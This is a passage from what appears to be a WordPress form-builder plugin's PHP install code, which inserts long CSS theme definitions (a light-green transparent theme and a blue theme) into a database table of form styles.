#ECBE9C;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 06 transparent (light green button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #90EE90;\r\nmargin-bottom: 10px;\r\ncolor: #90EE90;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #6BD86B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #459B45;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #90EE90;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: " ";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #6BD86B;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #459B45;\r\n}\r\n.button-submit:hover {\r\n	background: #90EE90;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #6BD86B ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #6BD86B  ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #6BD86B ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #90EE90;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #6BD86B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #72DB72 ;\r\n	background: -moz-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #8FEB8F ), color-stop(39%, #5CF35C ), color-stop(100%, #72DB72 ));\r\n	background: -o-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -ms-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -webkit-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #E0E0E0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 07 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #0072A2;\r\nmargin-bottom: 10px;\r\ncolor: #0072A2;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	